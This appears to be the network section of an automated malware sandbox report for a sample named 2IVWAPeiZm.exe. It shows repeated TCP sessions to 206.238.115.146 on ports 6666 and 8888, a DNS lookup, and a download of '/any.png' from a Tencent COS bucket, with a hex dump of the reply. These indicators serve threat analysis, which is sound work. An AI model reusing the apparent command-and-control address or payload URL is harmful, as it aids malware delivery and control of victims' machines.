                        Jul 5, 2024 07:33:10.085774899 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085792065 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085809946 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085854053 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085863113 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085896969 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085930109 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.085941076 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.085966110 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.086010933 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.086087942 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.126178026 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294399023 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294440985 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294497013 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294543982 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294579983 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294612885 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294631004 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294631004 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294647932 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294656992 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294796944 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294831038 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294842958 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294866085 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294898033 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294912100 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.294934034 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294966936 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.294980049 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295017004 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295052052 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295068026 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295175076 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295226097 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295228958 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295263052 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295311928 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295375109 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295408010 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295442104 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295452118 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295480013 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295535088 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295677900 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295711040 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295746088 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295754910 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295780897 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295814991 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295849085 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295871019 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295883894 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295900106 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.295918941 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.295965910 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296062946 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296118021 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296152115 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296166897 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296266079 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296313047 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296314955 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296346903 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296381950 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296396971 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296572924 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296607018 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296626091 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296654940 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296709061 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296724081 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296744108 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296778917 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296791077 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296813965 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296852112 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296861887 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296931982 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.296981096 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.296999931 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297033072 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297079086 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297372103 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297425985 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297458887 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297472000 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297493935 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297528028 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297539949 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297560930 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297593117 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297599077 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297640085 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297672987 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297684908 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297707081 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297741890 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297750950 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297779083 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297827005 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.297878027 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297918081 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297939062 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.297971010 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298032999 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298068047 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298084021 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298104048 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298137903 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298152924 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298345089 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298393011 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298393965 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298427105 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298460007 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298474073 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298494101 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298527956 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298541069 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298563004 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298595905 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298645973 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298695087 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298741102 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.298790932 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298826933 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.298871994 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.502604008 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.502641916 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.502679110 CEST666649731206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:10.502700090 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:10.548160076 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:11.541261911 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:11.546479940 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:11.546561956 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:13.516917944 CEST497316666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:16.441138983 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:16.447603941 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:16.447643995 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:16.447701931 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:16.447731972 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:16.761554003 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:16.761987925 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:16.769424915 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:28.813813925 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:28.818809032 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:29.125607967 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:29.173065901 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:29.199779987 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:29.204931974 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:29.205005884 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:29.205014944 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:29.205025911 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.001792908 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:47.007042885 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.321389914 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.376214027 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:47.395730972 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:33:47.400609970 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.400645018 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.400676012 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:33:47.400708914 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:04.892164946 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:04.897274017 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:05.203994036 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:05.251223087 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:05.255207062 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:05.260135889 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:05.260190964 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:05.260221004 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:05.260266066 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:21.149333000 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:21.154335022 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:21.459717035 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:21.532500982 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:22.066674948 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:22.071692944 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:22.071736097 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:22.071764946 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:22.071834087 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:37.641953945 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:37.641990900 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:37.647680044 CEST666649732206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:37.649816036 CEST497326666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:39.579978943 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:39.585019112 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:39.585848093 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:44.738759995 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:44.743824005 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:44.743895054 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:44.743930101 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:44.743937969 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:45.046828032 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:45.047312975 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:45.052239895 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:56.735753059 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:56.735804081 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:56.740833044 CEST888849740206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:56.745940924 CEST497408888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:58.673774004 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:34:58.678886890 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:34:58.678989887 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:04.855492115 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:04.864209890 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:04.864566088 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:04.865016937 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:04.868025064 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:05.380085945 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:05.384074926 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:05.393997908 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.017196894 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:17.022109985 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.322954893 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.356991053 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:17.361917019 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.362075090 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.362107038 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:17.362140894 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:32.860009909 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:32.860130072 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:32.865160942 CEST666649741206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:32.865221977 CEST497416666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:34.798644066 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:34.806459904 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:34.809895992 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:39.869887114 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:39.876976967 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:39.877021074 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:39.877057076 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:39.878592968 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:40.384373903 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:40.390136957 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:40.394998074 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:51.595324993 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:51.595390081 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:51.600286961 CEST888849742206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:51.600367069 CEST497428888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:53.544717073 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:53.549557924 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:53.549650908 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:58.399033070 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:58.403939009 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:58.403955936 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:58.403969049 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:58.404108047 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:58.926358938 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:35:58.926666021 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:35:58.931530952 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:09.907833099 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:09.912722111 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:10.220365047 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:10.267000914 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:10.280021906 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:10.285178900 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:10.285197020 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:10.285239935 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:10.285286903 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:27.345233917 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:27.345278978 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:27.351739883 CEST666649743206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:27.351788998 CEST497436666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:29.283329964 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:29.288297892 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:29.289948940 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:35.399712086 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:35.404961109 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:35.405071020 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:35.405080080 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:35.405086994 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:35.722728968 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:35.724322081 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:35.729151011 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:46.705177069 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:46.705212116 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:46.711031914 CEST888849744206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:46.711093903 CEST497448888192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:48.642529964 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:48.647367954 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:48.647559881 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:53.574806929 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:53.583329916 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:53.583450079 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:53.583461046 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:53.583472013 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:53.892811060 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:36:53.893457890 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:36:53.899755001 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:05.814492941 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:37:05.819443941 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:06.129103899 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:06.173331976 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:37:06.173650026 CEST497456666192.168.2.4206.238.115.146
                        Jul 5, 2024 07:37:06.178544044 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:06.178555012 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:06.178565979 CEST666649745206.238.115.146192.168.2.4
                        Jul 5, 2024 07:37:06.178606987 CEST666649745206.238.115.146192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 5, 2024 07:33:02.446135998 CEST5882053192.168.2.41.1.1.1
                        Jul 5, 2024 07:33:02.773952961 CEST53588201.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jul 5, 2024 07:33:02.446135998 CEST192.168.2.41.1.1.10x573cStandard query (0)pattern-1326658104.cos.ap-guangzhou.myqcloud.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 5, 2024 07:33:02.773952961 CEST1.1.1.1192.168.2.40x573cNo error (0)pattern-1326658104.cos.ap-guangzhou.myqcloud.comgz.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                        Jul 5, 2024 07:33:02.773952961 CEST1.1.1.1192.168.2.40x573cNo error (0)gz.file.myqcloud.com159.75.57.35A (IP address)IN (0x0001)false
                        Jul 5, 2024 07:33:02.773952961 CEST1.1.1.1192.168.2.40x573cNo error (0)gz.file.myqcloud.com159.75.57.69A (IP address)IN (0x0001)false
                        Jul 5, 2024 07:33:02.773952961 CEST1.1.1.1192.168.2.40x573cNo error (0)gz.file.myqcloud.com159.75.57.36A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • pattern-1326658104.cos.ap-guangzhou.myqcloud.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730159.75.57.354437272C:\Users\user\Desktop\2IVWAPeiZm.exe
                        TimestampBytes transferredDirectionData
                        2024-07-05 05:33:04 UTC137OUTGET /any.png HTTP/1.1
                        User-Agent: WinINetDownloader
                        Host: pattern-1326658104.cos.ap-guangzhou.myqcloud.com
                        Cache-Control: no-cache
                        2024-07-05 05:33:04 UTC421INHTTP/1.1 200 OK
                        Content-Type: image/png
                        Content-Length: 1107015
                        Connection: close
                        Accept-Ranges: bytes
                        Content-Disposition: attachment
                        Date: Fri, 05 Jul 2024 05:33:04 GMT
                        ETag: "c5497a158a878995bb05025560ddaec2"
                        Last-Modified: Wed, 19 Jun 2024 03:33:16 GMT
                        Server: tencent-cos
                        x-cos-force-download: true
                        x-cos-hash-crc64ecma: 16225716134087835629
                        x-cos-request-id: NjY4Nzg1OTBfYTkyZTJjMGJfMjU2ZTBfNGMzYWMw
                        2024-07-05 05:33:04 UTC15963INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 bc 00 00 04 03 08 02 00 00 00 23 af 7a 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c dc bd db 6e 24 bb b2 24 e8 8c 94 54 6b af 87 69 a0 1f a7 81 fe 8b 69 cc ff 7f 52 03 67 ef 2a 49 19 9c 07 17 4d 46 33 27 33 a4 aa 7d e6 cc 10 82 90 19 49 3a fd ee ce 6b b4 ff fe 3f ff d7 fd 7e 3f 8e e3 e5 e5 e5 38 8e f3 3c 5f 5f 5f cf f3 6c ad 3d 3f 3f 1f c7 71 bf df ef f7 7b ef bd b5 76 1c c7 71 1c ad b5 de 7b ef 3d 22 22 a2 f7 16 11 ad b5 f1 b5 9f e7 d9 7b 3f 8e 23 9f f3 4f 71 ad 70 5f 6f 6f 6f 0c ff 21 1c ae b9 7a c2 25 c9 cf be 18 ff a7 a7 a7 99 cc 8f cf 59 2d 99 70 9e 27 68 fc
                        Data Ascii: PNGIHDR#zpHYs%%IR$tEXtSoftwareSnipaste] IDATxn$$TkiiRg*IMF3'3}I:k?~?8<___l=??q{vq{=""{?#Oqp_ooo!z%Y-p'h
